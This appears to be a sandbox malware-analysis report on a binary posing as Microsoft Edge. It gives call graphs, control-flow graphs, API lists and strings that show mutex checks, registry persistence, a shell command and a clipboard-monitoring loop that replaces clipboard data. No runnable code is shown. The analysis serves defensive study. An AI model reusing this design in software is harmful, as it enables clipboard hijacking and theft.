7ff62b642156 5448 7ff62b645adc 5392->5448 5395 7ff62b641ae1 5394->5395 5397 7ff62b641ae9 5394->5397 5465 7ff62b647f14 5395->5465 5397->5290 5399 7ff62b648484 ?tolower@?$ctype@D@std@@QEBADD 5398->5399 5400 7ff62b648497 5398->5400 5399->5400 5402 7ff62b6484bd 5400->5402 5479 7ff62b64b7e0 5400->5479 5402->5290 5485 7ff62b645010 5403->5485 5405 7ff62b646048 4 API calls 5406 7ff62b6487eb 5405->5406 5406->5405 5408 7ff62b649638 27 API calls 5406->5408 5410 7ff62b648818 5406->5410 5418 7ff62b648816 5406->5418 5407 7ff62b645a1c _invalid_parameter_noinfo_noreturn 5409 7ff62b6488a0 5407->5409 5408->5406 5409->5290 5411 7ff62b645010 9 API calls 5410->5411 5410->5418 5417 7ff62b648831 5411->5417 5412 7ff62b64887f 5413 7ff62b646048 4 API calls 5412->5413 5414 7ff62b648889 5413->5414 5490 7ff62b645a1c 5414->5490 5415 7ff62b649638 27 API calls 5415->5417 5417->5412 5417->5415 5419 7ff62b646048 _invalid_parameter_noinfo_noreturn _invalid_parameter_noinfo_noreturn ?_Xlength_error@std@@YAXPEBD malloc 5417->5419 5418->5407 5419->5417 5421 7ff62b646075 5420->5421 5422 7ff62b64608b 5420->5422 5423 7ff62b641aac 4 API calls 5421->5423 5424 7ff62b6460b3 5422->5424 5510 7ff62b641b48 5422->5510 5423->5422 5424->5290 5427 7ff62b648ad8 5426->5427 5428 7ff62b648ace 5426->5428 5429 7ff62b645010 9 API calls 5427->5429 5518 7ff62b648904 5428->5518 5432 7ff62b648ae8 5429->5432 5431 7ff62b648ad3 5431->5290 5433 7ff62b648b55 5432->5433 5434 7ff62b648b80 5432->5434 5446 7ff62b648b32 5432->5446 5437 7ff62b649638 27 API calls 5433->5437 5435 7ff62b648ba0 5434->5435 5438 7ff62b649638 27 API calls 5434->5438 5439 7ff62b648bd7 5435->5439 5441 7ff62b648beb 5435->5441 5444 7ff62b646048 4 API calls 5435->5444 5436 7ff62b649638 27 API calls 5436->5439 5440 7ff62b648b65 5437->5440 5438->5435 5439->5441 5442 7ff62b646048 4 API calls 5439->5442 5440->5439 5440->5441 5445 7ff62b646048 4 API calls 5440->5445 5443 7ff62b645a1c _invalid_parameter_noinfo_noreturn 5441->5443 5442->5441 5443->5431 5444->5446 5445->5446 5446->5436 5447->5392 5449 7ff62b645aea 5448->5449 5450 7ff62b645b1b 5448->5450 5449->5450 5451 7ff62b645b37 _invalid_parameter_noinfo_noreturn 5449->5451 5450->5380 5452 7ff62b645b4c 5451->5452 5453 7ff62b645b51 5451->5453 5456 7ff62b64a16c 5452->5456 5453->5380 5457 7ff62b64a1e8 5456->5457 5460 7ff62b64a186 5456->5460 5457->5453 5458 7ff62b645dac _invalid_parameter_noinfo_noreturn 5458->5460 5459 7ff62b64a19d 5459->5457 5461 7ff62b64a211 _invalid_parameter_noinfo_noreturn 5459->5461 5460->5458 5460->5459 5462 7ff62b64a229 5461->5462 5463 7ff62b64a271 5461->5463 5462->5463 5464 7ff62b64a28d _invalid_parameter_noinfo_noreturn 5462->5464 5463->5453 5466 7ff62b648003 Concurrency::cancel_current_task 5465->5466 5469 7ff62b647f41 5465->5469 5478 7ff62b64a594 ?_Xlength_error@std@@YAXPEBD 5466->5478 5471 7ff62b647f99 5469->5471 5472 7ff62b647fc8 _invalid_parameter_noinfo_noreturn 5469->5472 5470 7ff62b647fb1 5473 7ff62b647fcf 5470->5473 5474 7ff62b647fbe 5470->5474 5471->5466 5471->5470 5472->5473 5476 7ff62b647fc6 5473->5476 5477 7ff62b64cc88 std::_Facet_Register malloc 5473->5477 5475 7ff62b641a70 2 API calls 5474->5475 5475->5476 5476->5397 5477->5476 5481 7ff62b64b811 5479->5481 5480 7ff62b64b869 5482 7ff62b64d030 8 API calls 5480->5482 5481->5480 5483 7ff62b64b862 _invalid_parameter_noinfo_noreturn 5481->5483 5484 7ff62b64b87d 5482->5484 5483->5480 5484->5402 5486 7ff62b6420cc 8 API calls 5485->5486 5487 7ff62b645060 5486->5487 5495 7ff62b642190 5487->5495 5491 7ff62b645a2e 5490->5491 5492 7ff62b645abd _invalid_parameter_noinfo_noreturn 5491->5492 5493 7ff62b645aa0 5491->5493 5494 7ff62b645ad0 5492->5494 5493->5418 5494->5418 5496 7ff62b642199 5495->5496 5497 7ff62b642237 5495->5497 5498 7ff62b64224b 5496->5498 5499 7ff62b6421cb 5496->5499 5497->5406 5500 7ff62b64a594 ?_Xlength_error@std@@YAXPEBD 5498->5500 5501 7ff62b6421d8 5499->5501 5502 7ff62b6421e5 5499->5502 5503 7ff62b642250 5500->5503 5504 7ff62b641a70 _invalid_parameter_noinfo_noreturn malloc 5501->5504 5505 7ff62b64cc88 std::_Facet_Register malloc 5502->5505 5506 7ff62b6421e0 5502->5506 5504->5506 5505->5506 5507 7ff62b6426b8 memmove 5506->5507 5508 7ff62b642219 5507->5508 5509 7ff62b645b58 _invalid_parameter_noinfo_noreturn _invalid_parameter_noinfo_noreturn 5508->5509 5509->5497 5511 7ff62b641b7d 5510->5511 5513 7ff62b641b85 5510->5513 5514 7ff62b648010 5511->5514 5513->5424 5515 7ff62b648105 5514->5515 5516 7ff62b64a594 ?_Xlength_error@std@@YAXPEBD 5515->5516 5517 7ff62b64810a 5516->5517 5519 7ff62b645010 9 API calls 5518->5519 5523 7ff62b64893e 5519->5523 5520 7ff62b64896f 5522 7ff62b645010 9 API calls 5520->5522 5521 7ff62b649638 27 API calls 5521->5523 5524 7ff62b64897b 5522->5524 5523->5520 5523->5521 5526 7ff62b648a41 5523->5526 5525 7ff62b649638 27 API calls 5524->5525 5527 7ff62b648996 5525->5527 5528 7ff62b646048 4 API calls 5526->5528 5531 7ff62b646048 4 API calls 5527->5531 5533 7ff62b6489af 5527->5533 5538 7ff62b648a4f 5527->5538 5529 7ff62b648a4d 5528->5529 5530 7ff62b645a1c _invalid_parameter_noinfo_noreturn 5529->5530 5535 7ff62b648a81 5530->5535 5531->5533 5532 7ff62b648a54 5537 7ff62b646048 4 API calls 5532->5537 5533->5532 5536 7ff62b641aac 4 API calls 5533->5536 5533->5538 5539 7ff62b649638 27 API calls 5533->5539 5540 7ff62b646048 4 API calls 5533->5540 5534 7ff62b645a1c _invalid_parameter_noinfo_noreturn 5534->5529 5535->5431 5536->5533 5537->5538 5538->5534 5539->5533 5540->5533 5542 7ff62b641cac 5541->5542 5547 7ff62b641bf0 5541->5547 5543 7ff62b641d16 5542->5543 5544 7ff62b641ce6 ?tolower@?$ctype@D@std@@QEBADD ?tolower@?$ctype@D@std@@QEBADD 5542->5544 5543->5235 5544->5542 5544->5543 5545 7ff62b64b7e0 9 API calls 5545->5547 5546 7ff62b641c53 5546->5235 5547->5545 5547->5546 5549 7ff62b64d872 RtlLookupFunctionEntry 5548->5549 5550 7ff62b64d888 RtlVirtualUnwind 5549->5550 5551 7ff62b64d7af 5549->5551 5550->5549 5550->5551 5552 7ff62b64d750 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5551->5552 6217 7ff62b6462c8 free 6218 7ff62b6462f0 6217->6218 6219 7ff62b64dfc7 6220 7ff62b64dfda ??1_Locinfo@std@@QEAA 6219->6220 6221 7ff62b64dfe8 6219->6221 6220->6221 6222 7ff62b6419cc 6223 7ff62b6419d5 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 6222->6223 6224 7ff62b6419f4 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 6223->6224 6225 7ff62b641a00 6223->6225 6224->6225 6227 7ff62b64d2d4 6230 7ff62b64d8cc 6227->6230 6231 7ff62b64d2dd 6230->6231 6232 7ff62b64d8ef GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6230->6232 6232->6231 6237 7ff62b64dbd5 6238 7ff62b64dbe8 6237->6238 6239 7ff62b64dbf5 6237->6239 6240 7ff62b645cc4 std::locale::global _invalid_parameter_noinfo_noreturn 6238->6240 6240->6239 6241 7ff62b6418b9 6242 7ff62b6418bf 6241->6242 6243 7ff62b64564c ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 6242->6243 6244 7ff62b642e81 6243->6244 6245 7ff62b642ed6 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 6244->6245 6247 7ff62b642ead ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 6244->6247 6248 7ff62b642e89 6244->6248 6245->6248 6249 7ff62b642ec8 6245->6249 6246 7ff62b642f37 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 6250 7ff62b642f56 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 6246->6250 6251 7ff62b642f62 6246->6251 6247->6244 6247->6249 6248->6246 6249->6246 6249->6248 6252 7ff62b642ef8 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 6249->6252 6250->6251 6252->6248 6252->6249 5652 7ff62b64ab3c 5653 7ff62b64ac05 5652->5653 5658 7ff62b64ab93 5652->5658 5654 7ff62b64ac0a 5653->5654 5655 7ff62b64a634 2 API calls 5653->5655 5655->5654 5656 7ff62b64a634 2 API calls 5656->5658 5657 7ff62b64abe4 _Strxfrm 5657->5654 5657->5658 5658->5653 5658->5656 5658->5657 5659 7ff62b64df37 5660 7ff62b64df4a 5659->5660 5661 7ff62b64df57 5659->5661 5663 7ff62b645d20 5660->5663 5664 7ff62b64a294 5663->5664 5665 7ff62b64a2d0 5664->5665 5666 7ff62b64a2ef _invalid_parameter_noinfo_noreturn 5664->5666 5665->5661 6257 7ff62b64ddc2 6258 7ff62b64ddea 6257->6258 6259 7ff62b64ddd5 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 6257->6259 6259->6258 5667 7ff62b64d144 5671 7ff62b64d6e4 SetUnhandledExceptionFilter 5667->5671

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 7ff62b64b900-7ff62b64b952 1 7ff62b64b956-7ff62b64b961 0->1 2 7ff62b64b968-7ff62b64b980 OpenMutexA 1->2 3 7ff62b64b963-7ff62b64b966 1->3 4 7ff62b64b989-7ff62b64b9ac _dupenv_s 2->4 5 7ff62b64b982-7ff62b64b984 2->5 3->1 7 7ff62b64c88c 4->7 8 7ff62b64b9b2-7ff62b64b9ba 4->8 6 7ff62b64c88f-7ff62b64c8ba call 7ff62b64d030 5->6 7->6 8->7 9 7ff62b64b9c0-7ff62b64ba15 call 7ff62b641d68 call 7ff62b64242c 8->9 16 7ff62b64ba17-7ff62b64ba27 9->16 17 7ff62b64ba49-7ff62b64ba67 free 9->17 18 7ff62b64ba29-7ff62b64ba3b 16->18 19 7ff62b64ba44 call 7ff62b64ccc4 16->19 20 7ff62b64ba6e-7ff62b64ba79 17->20 18->19 21 7ff62b64ba3d-7ff62b64ba43 _invalid_parameter_noinfo_noreturn 18->21 19->17 23 7ff62b64ba7b-7ff62b64ba7e 20->23 24 7ff62b64ba80-7ff62b64bb76 call 7ff62b6423e8 call 7ff62b641f10 call 7ff62b6460cc call 7ff62b64a294 GetModuleFileNameA call 7ff62b6423a4 call 7ff62b64a810 20->24 21->19 23->20 37 7ff62b64bb7c-7ff62b64bbc8 call 7ff62b645284 24->37 38 7ff62b64c540-7ff62b64c557 call 7ff62b64a294 24->38 45 7ff62b64bbd1-7ff62b64bbe5 37->45 43 7ff62b64c559-7ff62b64c56e 38->43 44 7ff62b64c590-7ff62b64c5c5 call 7ff62b64a294 38->44 47 7ff62b64c58b call 7ff62b64ccc4 43->47 48 7ff62b64c570-7ff62b64c582 43->48 55 7ff62b64c5cc-7ff62b64c5d7 44->55 45->45 49 7ff62b64bbe7-7ff62b64bc0d call 7ff62b6418c8 45->49 47->44 48->47 51 7ff62b64c584-7ff62b64c58a _invalid_parameter_noinfo_noreturn 48->51 56 7ff62b64bc17-7ff62b64bc25 49->56 51->47 57 7ff62b64c5d9-7ff62b64c5dc 55->57 58 7ff62b64c5de-7ff62b64c5ea CreateMutexExA 55->58 59 7ff62b64bc27-7ff62b64bc2d 56->59 60 7ff62b64bc2f-7ff62b64bd38 call 7ff62b6418c8 call 7ff62b6424ac call 7ff62b6418b4 call 7ff62b6418c8 call 7ff62b6424ac call 7ff62b6418b4 call 7ff62b6418c8 56->60 57->55 61 7ff62b64c5f0-7ff62b64c607 SleepEx GetClipboardSequenceNumber 58->61 59->56 106 7ff62b64bd40-7ff62b64bd54 60->106 61->61 63 7ff62b64c609-7ff62b64c613 OpenClipboard 61->63 63->61 65 7ff62b64c615-7ff62b64c628 call 7ff62b646670 63->65 71 7ff62b64c877-7ff62b64c87c call 7ff62b64670c 65->71 72 7ff62b64c62e-7ff62b64c638 65->72 79 7ff62b64c857-7ff62b64c85e 71->79 72->71 75 7ff62b64c63e-7ff62b64c680 call 7ff62b641e44 72->75 84 7ff62b64c687-7ff62b64c68a 75->84 79->61 83 7ff62b64c864-7ff62b64c872 call 7ff62b64630c 79->83 83->61 87 7ff62b64c7fc-7ff62b64c80c call 7ff62b64670c 84->87 88 7ff62b64c690-7ff62b64c694 84->88 99 7ff62b64c83e-7ff62b64c850 87->99 100 7ff62b64c80e-7ff62b64c822 87->100 89 7ff62b64c69a-7ff62b64c6c6 call 7ff62b6449b0 88->89 90 7ff62b64c79e-7ff62b64c7a2 88->90 102 7ff62b64c746-7ff62b64c751 89->102 103 7ff62b64c6c8-7ff62b64c6d3 89->103 90->84 99->79 104 7ff62b64c839 call 7ff62b64ccc4 100->104 105 7ff62b64c824-7ff62b64c837 100->105 110 7ff62b64c787-7ff62b64c79c call 7ff62b641a34 102->110 111 7ff62b64c753-7ff62b64c767 102->111 107 7ff62b64c709-7ff62b64c743 memmove 103->107 108 7ff62b64c6d5-7ff62b64c6e9 103->108 104->99 105->104 109 7ff62b64c885-7ff62b64c88b _invalid_parameter_noinfo_noreturn 105->109 106->106 113 7ff62b64bd56-7ff62b64bdec call 7ff62b6418c8 call 7ff62b6424ac call 7ff62b6418b4 call 7ff62b6418c8 106->113 107->102 114 7ff62b64c6eb-7ff62b64c6fe 108->114 115 7ff62b64c704 call 7ff62b64ccc4 108->115 109->7 110->90 124 7ff62b64c7a7-7ff62b64c7bf GlobalAlloc 110->124 116 7ff62b64c769-7ff62b64c77c 111->116 117 7ff62b64c782 call 7ff62b64ccc4 111->117 133 7ff62b64bdf2-7ff62b64bdfd 113->133 114->115 121 7ff62b64c87e-7ff62b64c884 _invalid_parameter_noinfo_noreturn 114->121 115->107 116->117 116->121 117->110 121->109 124->87 126 7ff62b64c7c1-7ff62b64c7f6 memmove EmptyClipboard SetClipboardData 124->126 126->87 134 7ff62b64be04-7ff62b64bea7 call 7ff62b6418c8 call 7ff62b6424ac call 7ff62b6418b4 133->134 135 7ff62b64bdff-7ff62b64be02 133->135 142 7ff62b64beb0-7ff62b64bec4 134->142 135->133 142->142 143 7ff62b64bec6-7ff62b64bef0 call 7ff62b6418c8 142->143 146 7ff62b64bef9-7ff62b64bf07 143->146 147 7ff62b64bf09-7ff62b64bf0f 146->147 148 7ff62b64bf11-7ff62b64bfa9 call 7ff62b6418c8 call 7ff62b6424ac call 7ff62b6418b4 call 7ff62b6418c8 146->148 147->146 157 7ff62b64bfac-7ff62b64bfc0 148->157 157->157 158 7ff62b64bfc2-7ff62b64c03e call 7ff62b6418c8 call 7ff62b6424ac call 7ff62b6418b4 157->158 165 7ff62b64c046-7ff62b64c05a 158->165 165->165 166 7ff62b64c05c-7ff62b64c08c call 7ff62b6418c8 * 2 165->166 171 7ff62b64c0bd-7ff62b64c0df 166->171 172 7ff62b64c08e-7ff62b64c09e 166->172 175 7ff62b64c110-7ff62b64c132 171->175 176 7ff62b64c0e1-7ff62b64c0f1 171->176 173 7ff62b64c0b8 call 7ff62b64ccc4 172->173 174 7ff62b64c0a0-7ff62b64c0b2 172->174 173->171 174->173 177 7ff62b64c24f-7ff62b64c255 _invalid_parameter_noinfo_noreturn 174->177 181 7ff62b64c163-7ff62b64c185 175->181 182 7ff62b64c134-7ff62b64c144 175->182 179 7ff62b64c10b call 7ff62b64ccc4 176->179 180 7ff62b64c0f3-7ff62b64c105 176->180 188 7ff62b64c256 call 7ff62b64ccc4 177->188 179->175 180->177 180->179 183 7ff62b64c1b6-7ff62b64c1d8 181->183 184 7ff62b64c187-7ff62b64c197 181->184 186 7ff62b64c146-7ff62b64c158 182->186 187 7ff62b64c15e call 7ff62b64ccc4 182->187 191 7ff62b64c1da-7ff62b64c1ea 183->191 192 7ff62b64c205-7ff62b64c227 183->192 189 7ff62b64c199-7ff62b64c1ab 184->189 190 7ff62b64c1b1 call 7ff62b64ccc4 184->190 186->177 186->187 187->181 195 7ff62b64c25b-7ff62b64c2a9 188->195 189->177 189->190 190->183 197 7ff62b64c1ec-7ff62b64c1fe 191->197 198 7ff62b64c200 call 7ff62b64ccc4 191->198 192->195 199 7ff62b64c229-7ff62b64c239 192->199 200 7ff62b64c2b2-7ff62b64c2c6 195->200 197->177 197->198 198->192 199->188 202 7ff62b64c23b-7ff62b64c24d 199->202 200->200 203 7ff62b64c2c8-7ff62b64c3c5 RegCreateKeyA call 7ff62b6424ac * 2 RegSetValueExA 200->203 202->177 202->188 208 7ff62b64c3c7-7ff62b64c3d7 203->208 209 7ff62b64c3f2-7ff62b64c414 203->209 210 7ff62b64c3ed call 7ff62b64ccc4 208->210 211 7ff62b64c3d9-7ff62b64c3eb 208->211 212 7ff62b64c416-7ff62b64c426 209->212 213 7ff62b64c448-7ff62b64c480 call 7ff62b64b754 system 209->213 210->209 211->210 215 7ff62b64c43c-7ff62b64c442 _invalid_parameter_noinfo_noreturn 211->215 217 7ff62b64c428-7ff62b64c43a 212->217 218 7ff62b64c443 call 7ff62b64ccc4 212->218 221 7ff62b64c482-7ff62b64c492 213->221 222 7ff62b64c4b4-7ff62b64c4de call 7ff62b645d28 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff62b64a294 213->222 215->218 217->215 217->218 218->213 223 7ff62b64c494-7ff62b64c4a6 221->223 224 7ff62b64c4af call 7ff62b64ccc4 221->224 231 7ff62b64c517-7ff62b64c53b call 7ff62b64a294 222->231 232 7ff62b64c4e0-7ff62b64c4f5 222->232 223->224 226 7ff62b64c4a8-7ff62b64c4ae _invalid_parameter_noinfo_noreturn 223->226 224->222 226->224 231->38 234 7ff62b64c4f7-7ff62b64c509 232->234 235 7ff62b64c512 call 7ff62b64ccc4 232->235 234->235 236 7ff62b64c50b-7ff62b64c511 _invalid_parameter_noinfo_noreturn 234->236 235->231 236->235
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter_noinfo_noreturn$Clipboard$memmove$CreateMutexOpen$??1?$basic_ios@AllocD@std@@@std@@DataEmptyFileGlobalModuleNameNumberSequenceSleepU?$char_traits@Value_dupenv_sfreesystem
                                    • String ID: && exit "$" "$" && $7*0&$9./5$92($?fd$@3%$F%)6$Microsoft Edge$localappdata$prr
                                    • API String ID: 1980490673-2619721367
                                    • Opcode ID: 0f8cdfebe0a83a0680be914d843486d997c6423b7a8fdb805b3714d5dd2bff2f
                                    • Instruction ID: c50a068585c41d69d731bc40940a156dc15b2c097ceca15235f67a0d627348db
                                    • Opcode Fuzzy Hash: 0f8cdfebe0a83a0680be914d843486d997c6423b7a8fdb805b3714d5dd2bff2f
                                    • Instruction Fuzzy Hash: B5925F62A08BC289EF30CF38DC643E96771FB49758F504635D65D8AAAADF78D244D301

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: __scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock_cexit_exit_get_wide_winmain_command_line_register_thread_local_exe_atexit_callback
                                    • String ID:
                                    • API String ID: 1020558986-0
                                    • Opcode ID: 78a97766118129f21d818817cbad7ed6548654daf1910381c6a4593ad2caefed
                                    • Instruction ID: 973927122e1c434acb38c096b9a5e1fd69c0f60fa1e1e9ee40cb7dfecffeff6f
                                    • Opcode Fuzzy Hash: 78a97766118129f21d818817cbad7ed6548654daf1910381c6a4593ad2caefed
                                    • Instruction Fuzzy Hash: 16310921E0C94355FE74AB65AC713BA22B1FF8A384F441434EA4DD76F7DE6CA804A213

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                    • String ID:
                                    • API String ID: 313767242-0
                                    • Opcode ID: aaac3d8bcd2409564a93bb2692e41ca80ea2fafb89281b964e3b37efff4b1c1f
                                    • Instruction ID: 22f33991f919ae54dd5fb5df4a0a4acd208d98b25025e559ec0d8e723618efc6
                                    • Opcode Fuzzy Hash: aaac3d8bcd2409564a93bb2692e41ca80ea2fafb89281b964e3b37efff4b1c1f
                                    • Instruction Fuzzy Hash: 6F313E72A09E818AEB709F60E8607ED73B1FB88748F444439DA4D87BA9DF38D548D711
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: FormatInfoLocaleMessage
                                    • String ID: !x-sys-default-locale
                                    • API String ID: 4235545615-2729719199
                                    • Opcode ID: 4a16ee6a4f9f7a58f6f0993f016c016337146f7ae58b0ac5f22ac39274476180
                                    • Instruction ID: 4f4facc04457f1df7bb62ef4f7c118c4d9139d14f11763e3fc8cffa2f5bcb6b6
                                    • Opcode Fuzzy Hash: 4a16ee6a4f9f7a58f6f0993f016c016337146f7ae58b0ac5f22ac39274476180
                                    • Instruction Fuzzy Hash: E401D872B08B8546EB208B11F8607B977A1F78D7D4F444135D64D82BA8CF3CD405C701

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 303 7ff62b64378c-7ff62b6437c6 304 7ff62b6438c6-7ff62b643905 call 7ff62b64a580 303->304 305 7ff62b6437cc-7ff62b6437de 303->305 318 7ff62b64390b-7ff62b64391d 304->318 319 7ff62b643a1e-7ff62b643a23 call 7ff62b64a580 304->319 306 7ff62b6437ec-7ff62b6437fb 305->306 307 7ff62b6437e0-7ff62b6437ea 305->307 306->307 310 7ff62b6437fd-7ff62b643816 306->310 309 7ff62b643818 call 7ff62b641a70 307->309 315 7ff62b64381d-7ff62b643820 309->315 310->309 312 7ff62b643822-7ff62b643825 310->312 316 7ff62b643827 312->316 317 7ff62b64382e 312->317 320 7ff62b643830-7ff62b643842 315->320 322 7ff62b643827 call 7ff62b64cc88 316->322 317->320 323 7ff62b64392b-7ff62b64393a 318->323 324 7ff62b64391f-7ff62b643929 318->324 328 7ff62b64388f-7ff62b64389b memmove 320->328 329 7ff62b643844-7ff62b643864 memmove 320->329 326 7ff62b64382c 322->326 323->324 330 7ff62b64393c-7ff62b643955 323->330 327 7ff62b643957 call 7ff62b641a70 324->327 326->315 339 7ff62b64395c-7ff62b64395f 327->339 331 7ff62b6438a1-7ff62b6438c5 328->331 333 7ff62b643866-7ff62b643879 329->333 334 7ff62b64387e-7ff62b643886 call 7ff62b64ccc4 329->334 330->327 335 7ff62b643961-7ff62b643964 330->335 340 7ff62b643888-7ff62b64388e _invalid_parameter_noinfo_noreturn 333->340 341 7ff62b64387b 333->341 334->331 336 7ff62b643966 335->336 337 7ff62b64396d 335->337 342 7ff62b643966 call 7ff62b64cc88 336->342 344 7ff62b64396f-7ff62b64398a 337->344 339->344 340->328 341->334 345 7ff62b64396b 342->345 346 7ff62b64398c-7ff62b6439b5 memmove * 2 344->346 347 7ff62b6439e0-7ff62b6439f6 memmove * 2 344->347 345->339 348 7ff62b6439b7-7ff62b6439ca 346->348 349 7ff62b6439cf-7ff62b6439d7 call 7ff62b64ccc4 346->349 350 7ff62b6439fb-7ff62b643a1d 347->350 351 7ff62b6439d9-7ff62b6439df _invalid_parameter_noinfo_noreturn 348->351 352 7ff62b6439cc 348->352 349->350 351->347 352->349
                                    APIs
                                    • memmove.VCRUNTIME140(?,00000000,?,00007FF62B642761,?,?,?,00007FF62B643EE1), ref: 00007FF62B64384A
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,00007FF62B642761,?,?,?,00007FF62B643EE1), ref: 00007FF62B643888
                                    • memmove.VCRUNTIME140(?,00000000,?,00007FF62B642761,?,?,?,00007FF62B643EE1), ref: 00007FF62B643892
                                    • memmove.VCRUNTIME140(?,?,?,00000000,?,00000000,?,00007FF62B642761,?,?,?,00007FF62B643EE1), ref: 00007FF62B643992
                                    • memmove.VCRUNTIME140(?,?,?,00000000,?,00000000,?,00007FF62B642761,?,?,?,00007FF62B643EE1), ref: 00007FF62B6439A0
                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,?,00000000,?,00007FF62B642761,?,?,?,00007FF62B643EE1), ref: 00007FF62B6439D9
                                    • memmove.VCRUNTIME140(?,?,?,00000000,?,00000000,?,00007FF62B642761,?,?,?,00007FF62B643EE1), ref: 00007FF62B6439E3
                                    • memmove.VCRUNTIME140(?,?,?,00000000,?,00000000,?,00007FF62B642761,?,?,?,00007FF62B643EE1), ref: 00007FF62B6439F1
                                      • Part of subcall function 00007FF62B64CC88: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62B648F80), ref: 00007FF62B64CCA2
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.2917143594.00007FF62B641000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF62B640000, based on PE: true
                                    • Associated: 00000012.00000002.2917070297.00007FF62B640000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917231574.00007FF62B64F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917308274.00007FF62B654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000012.00000002.2917394389.00007FF62B655000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_7ff62b640000_Msedge.jbxd
                                    Similarity
                                    • API ID: memmove$_invalid_parameter_noinfo_noreturn$malloc
                                    • String ID:
                                    • API String ID: 1479149652-0
                                    • Opcode ID: 7e944f2b0d9bcedb63418371ff5278b368d0ba77e2cce49da8892cb3a4319cea
                                    • Instruction ID: fdec764f572ff41ab939540fdef73015bcbbc7dcdf4a929a114d3837d6bcb643
                                    • Opcode Fuzzy Hash: 7e944f2b0d9bcedb63418371ff5278b368d0ba77e2cce49da8892cb3a4319cea
